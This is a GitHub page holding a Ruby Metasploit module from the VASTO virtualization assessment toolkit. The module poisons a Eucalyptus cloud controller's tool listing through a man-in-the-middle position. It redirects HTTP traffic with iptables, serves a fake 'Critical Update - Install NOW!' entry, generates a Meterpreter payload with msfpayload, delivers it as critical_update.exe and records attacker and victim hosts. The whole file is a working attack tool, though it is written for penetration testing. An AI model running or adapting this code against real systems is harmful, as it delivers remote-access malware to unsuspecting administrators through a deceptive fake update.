-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy patheucalyptus_poison.rb
196 lines (167 loc) · 6.68 KB
/
eucalyptus_poison.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
include Rex::FileUtils
def initialize
super(
'Name' => 'Eucalyptus Poison',
'Version' => '0.1',
'Description' => %q{
This module will assume a MITM attack is in place
against the remote Eucalyptus cloud controller.
The module will poison the Extra section of the interface,
presenting fake tools with the selected payload. This module
requres root privileges to run.
},
'Author' => ['Claudio Criscione'],
'License' => GPL_LICENSE
)
register_options(
[
OptPort.new('SRVPORT', [ true, "Local port to listen on.", 80 ]),
OptString.new('PAYLOAD', [ true, "Payload to run vs the client.", "windows/meterpreter/bind_tcp" ]),
], self.class)
end
def run
system("sudo iptables -t nat -A OUTPUT -p tcp --destination-port 80 -j DNAT --to 127.0.0.1")
@myhost = datastore['SRVHOST']
@myport = datastore['SRVPORT']
@payload = datastore['PAYLOAD']
@LPORT = datastore['LPORT']
@LHOST = datastore['LHOST']
@RHOST = datastore['RHOST']
@vasto_directory = ""
exploit()
end
def on_client_connect(c)
c.extend(Rex::Proto::Http::ServerClient)
c.init_cli(self)
end
def on_client_data(cli)
begin
data = cli.get_once(-1, 5)
raise ::Errno::ECONNABORTED if !data or data.length == 0
case cli.request.parse(data)
when Rex::Proto::Http::Packet::ParseCode::Completed
dispatch_request(cli, cli.request)
cli.reset_cli
when Rex::Proto::Http::Packet::ParseCode::Error
close_client(cli)
end
rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
rescue ::OpenSSL::SSL::SSLError
rescue ::Exception
print_status("EucaPoison - Error: #{$!.class} #{$!} #{$!.backtrace}")
end
close_client(cli)
end
def close_client(cli)
cli.close
# Require to clean up the service properly
raise ::EOFError
end
def dispatch_request(cli, req)
#Find vasto directory
@vasto_directory = "#{Msf::Config.module_directory}/auxiliary/vasto"
@vasto_directory = "#{Msf::Config.user_module_directory}/auxiliary/vasto" if(not File.exist?(@vasto_directory))
p "vasto modules not found!\nMust reside in: #{Msf::Config.module_directory}/auxiliary/vasto\n or: #{Msf::Config.user_module_directory}/auxiliary/vasto" if(not File.exist?(@vasto_directory))
phost = cli.peerhost
mysrc = Rex::Socket.source_address(cli.peerhost)
hhead = (req['Host'] || @myhost).split(':', 2)[0]
if (req.resource =~ /^http\:\/+([^\/]+)(\/*.*)/)
req.resource = $2
hhead, nport = $1.split(":", 2)[0]
@myport = nport || 80
end
#Providing a standard image list - we could poison this one too some day
#TODO poison images
if(req.resource == "/downloads/eucalyptus-images/list.php")
data =
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-centos-5.3-i386.tar.gz euca-centos-5.3-i386.tar.gz CentOS 5.3 i386\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-centos-5.3-x86_64.tar.gz euca-centos-5.3-x86_64.tar.gz CentOS 5.3 x86_64\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-debian-5.0-i386.tar.gz euca-debian-5.0-i386.tar.gz Debian 5.0 (lenny) i386\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-debian-5.0-x86_64.tar.gz euca-debian-5.0-x86_64.tar.gz Debian 5.0 (lenny) x86_64\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-fedora-10-x86_64.tar.gz euca-fedora-10-x86_64.tar.gz Fedora 10 x86_64\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-fedora-11-i386.tar.gz euca-fedora-11-i386.tar.gz Fedora 11 i386\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-ubuntu-9.04-i386.tar.gz euca-ubuntu-9.04-i386.tar.gz Ubuntu 9.04 (jaunty) i386\r\n" +
"http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-ubuntu-9.04-x86_64.tar.gz euca-ubuntu-9.04-x86_64.tar.gz Ubuntu 9.04 (jaunty) x86_64\r\n"
res =
"HTTP/1.1 200 Ok\r\n" +
"Host: #{mysrc}\r\n" +
"Content-Type: binary/octet-string\r\n" +
"Content-Length: #{data.length}\r\n" +
"Connection: Close\r\n\r\n#{data}"
cli.put(res)
return
end
#Here we generate the poisonous list
if(req.resource == "/downloads/eucalyptus-tools/list.php")
print_status("EucaPoison - Client #{cli.peerhost} is requesting tool list. Generating evil list.")
data =
"http://www.eucalyptussoftware.com/critical_update.exe critical_update Critical Update - Install NOW!\r\n" +
"http://open.eucalyptus.com/wiki/Euca2oolsGuide euca2ools Eucalyptus Client Tools\r\n" +
"http://open.eucalyptus.com/wiki/ToolsEcosystem other clients Eucalyptus Ecosystem Page\r\n"
res =
"HTTP/1.1 200 Ok\r\n" +
"Host: #{mysrc}\r\n" +
"Content-Type: binary/octet-string\r\n" +
"Content-Length: #{data.length}\r\n" +
"Connection: Close\r\n\r\n#{data}"
cli.put(res)
return
end
#Send the malicious payload
if(req.resource == "/critical_update.exe")
print_status("EucaPoison - Bingo #{cli.peerhost} is asking for the critical update. Infecting.")
create_exploit()
print_status("#{cli.peerhost} uploading exploit")
data = File.read("#{@vasto_directory}/data/eucapoison.exe")
res =
"HTTP/1.1 200 Ok\r\n" +
"Host: #{mysrc}\r\n" +
"Content-Type: binary/octet-string\r\n" +
"Content-Length: #{data.length}\r\n" +
"Connection: Close\r\n\r\n#{data}"
cli.put(res)
print_status("EucaPoison - Saving session information on DB")
report_note(
:type => 'host.Eucalyptus.poison',
:data => {
:attacker_host => @LHOST,
:attacker_port => @LPORT,
:victim_host => cli.peerhost,
:victim_port => @RPORT,
:payload => @payload
},
:update => :unique_data
)
return
end
end
# Creating the exploit with a lame call to msfpayload
def create_exploit()
poison_path = "#{@vasto_directory}/data/eucapoison.exe"
print_status("EucaPoison - Creating payload...")
executeme = "#{Msf::Config.install_root}/msfpayload #{@payload} "
if @LHOST != nil
executeme = executeme + "LHOST=#{@LHOST} "
end
if @LPORT != nil
executeme = executeme + "LPORT=#{@LPORT} "
end
if @RPORT != nil
executeme = executeme + "RPORT = #{@RPORT} "
end
executeme = executeme + "X > #{poison_path}"
print_status("Executing #{executeme}")
system(executeme)
end
end